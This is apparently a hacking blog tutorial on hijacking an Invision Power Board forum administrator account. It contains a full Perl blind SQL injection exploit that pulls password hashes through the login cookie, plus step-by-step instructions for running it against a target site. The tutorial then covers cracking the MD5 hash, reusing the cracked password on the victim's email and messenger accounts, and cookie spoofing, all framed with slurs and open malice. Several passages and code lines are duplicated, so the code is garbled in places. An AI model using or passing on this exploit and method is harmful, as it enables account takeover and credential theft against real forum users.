This tutorial will allow you to get an admins password and hack the
forum.
First of all, what you need is a forum to hack. For the
sake of this tutorial, and for the safety of aspecific site, I will not release the URL of the site
that I will be hacking in this. I will be referring toit as "hackingsite"
So you've got your target. You know the forum to want to hack, but how?
Let's find the user we
want to hack. Typically, you'd want to hack the admin. The administrator
is usually the first
member, therefore his/her User ID will be "1". Find the User ID of the
administrator, or person you
wish to hack. For this tutorial, let's say his/her ID is "2".
Got it? Well, now we are almost all set. So far, we
know the site we wish to hack, and the memberwe wish to hack. In this case, we are hacking the
administrator of "hackingsite", which is User ID"2".
Now we need a nice exploit. I preferably, for 1.3.1 forums, use one that
is in common circulation
around these forums. For those who don't have it, here:
CODE
#!/usr/bin/perl -w
##################################################################
#
This one actually works :) Just paste the outputted cookie into
# your request header using livehttpheaders or something and
you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by "ReMuSOMeGa & Nova" and http://remusomega.com
################################################################### will probably be logged in as that user. No need to decrypt it!
# Exploit coded by "ReMuSOMeGa & Nova" and http://remusomega.com
use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent("Mosiac 1.0" . $ua->agent);
if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}
my $path = $ARGV[0] .
'/index.php?act=Login&CODE=autologin';my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?
if (!$ARGV[2])
{print "..By ReMuSoMeGa & Nova. Usage: ipb.pl
http://forums.site.org [id] [ver 1/2].\n\n";
exit;
}my @charset =
("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");
my $outputs = '';
for( $i=1; $i < 33; $i++ )
{for( $j=0; $j < 16; $j++ )
{my $current = $charset[$j];
my $sql = ( $iver < 2 ) ?"99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" :
"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*";
my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
my $res = $ua->get($path, @cookie);
# If we get a valid sql request then this
# does not appear anywhere in the sources
$pattern = '';
$_ = $res->content;
if ($dbug) { print };
if ( !(/$pattern/) )
{$outputs .= $current;
print "$current\n";
last;
}}if ( length($outputs) < 1 ) { print "Not Exploitable!\n"; exit; }
last;
}}if ( length($outputs) < 1 ) { print "Not Exploitable!\n"; exit; }
}print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre .
"pass_hash=" . $outputs;
exit;
# ReMuSoMeGa & nova
exit;
# ReMuSoMeGa & nova
What the fuck,Pretty confused, aren't you? What the fuck are
you supposed to do with this shit?!
I'll tell you. First of all, this is a Perl script. Copy and
paste that code into Notepad.
How can you execute Perl scripts? Well, you can upload them to
your CGI-BIN, or you can take
my route of preference, and install Perl on your PC.Your going to want to go and get ActivePerl. I am sure it's here
somewhere in Appz.Open the file up, and let it install. Leave everything on default. In otherwords, just keep hitting "OK".
So now you have Perl installed. Open up "My Computer", and then click on "Local Disk (C:/)". In
there, you should see a folder named "Perl". Open up that folder, and within "Perl", you should
see another folder named "bin". Open up "bin". Now that your in, drag and drop "ipb.pl" from your
desktop, into "bin".
Alrighty. Now everything is fine, and you're ready to Pwn some FAGS.
What your going to want to do now, is open up your command
prompt. If you don't know how,
please quit this site, and die.... Start - Run -
CMD
Alright, so now your in your command prompt.
You want to change the directory in your command
prompt to your Perl/bin directory. To do this, type the
following into your command prompt, and hit
enter:
cd C:\Perl\bin
Good job. Your very, very close to being finished. Now that you are in the Perl/bin directory, we
need to access the ipb.pl file. How do we do this? Type the following command into your
command prompt:
perl ipb.p
At this point, it should be fairly obvious what to do.. But since I <3 n00bs so much, I'm going to elaborate.
Your exploit is now executed. All you need to do now, is know
how to use it. Usage is simple.
Remember who and what site we were hacking? In case you
forgot, we were hacking User ID 2,
who is the admin of http://hackingsite.com.
So, this is what we need to do. Type the following command into your command prompt:
ipb.pl http://hackingsite.com/forum 2 1
Obviously replace "http://hackingsite.com/forum" with the URL to the forum you wish to hack.
Now, this may take a minute. The exploit is gathering information, and grabbing the hash.
So, this is what we need to do. Type the following command into your command prompt:
ipb.pl http://hackingsite.com/forum 2 1
Obviously replace "http://hackingsite.com/forum" with the URL to the forum you wish to hack.
Now, this may take a minute. The exploit is gathering information, and grabbing the hash.
Numbers/letters will slowly appear down the screen. Don't be
alarmed, and allow the program a
few minutes. Once the hash grabbing is complete, it will
return a full hash, as well as User ID.Now you have the hash. In our case, the hash is: 4114d9d3061dd2a41d2c64f4d2bb1a7f
But what can we do with this hash? To you, it just looks like a scramble of numbers and letters.
What this is, is an MD5 hash. This is the person's password,
encrypted using the MD5 algorthrim.
I urge you to do a quick read-up on MD5 hash's before
continuing reading.
Done? You understand the very basics of MD5s? Good. You're
probably thinking: I just read that
MD5 hashes cannot be cracked!
LOL.. Indeed, MD5s are impossible to reverse. Once a string is
MD5ed, there is no way to get it
back to plain-text. It is IMPOSSIBLE to decrypt an MD5 hash. But.. It is NOT impossible to
CRACK an MD5 hash.
back to plain-text. It is IMPOSSIBLE to decrypt an MD5 hash. But.. It is NOT impossible to
CRACK an MD5 hash.
There are many places online where you can enter hashes to be
cracked. Personally, I use "Cain
& Able", which is a great MD5 cracker availiable at
'http://odix.it'.
You can use any method, and any crackers to crack this hash.
90% of the hashes I get, I am able
to crack. Once you crack the hash, you will be given a
plain-text password.
CONGRATS!
You now have the victims password! You can now login to his/her account
on
whatever forum you were hacking. Hell, you could even try that password on his/her e-mail or
MSN/AIM account. Sure bro, fuck them up
whatever forum you were hacking. Hell, you could even try that password on his/her e-mail or
MSN/AIM account. Sure bro, fuck them up
But what if the hash is not crackable? You are merely left
with a password hash. What can you do
with this?Well, you can spoof your cookie!
If you would like to learn more on spoofing cookies, use the friendly searching site they call
"GOOGLE"
To crack the hashs go to milw0rm.com
ActivePerl Download(Thanks Hash):DOWNLOAD here: http://downloads.activestate.com/ActivePerl/Windows/5.8/ActivePerl-5.8.7.813-MSWin32-x86- 148120.msi
[Credit for the first person who can post it.]
0 comments:
Post a Comment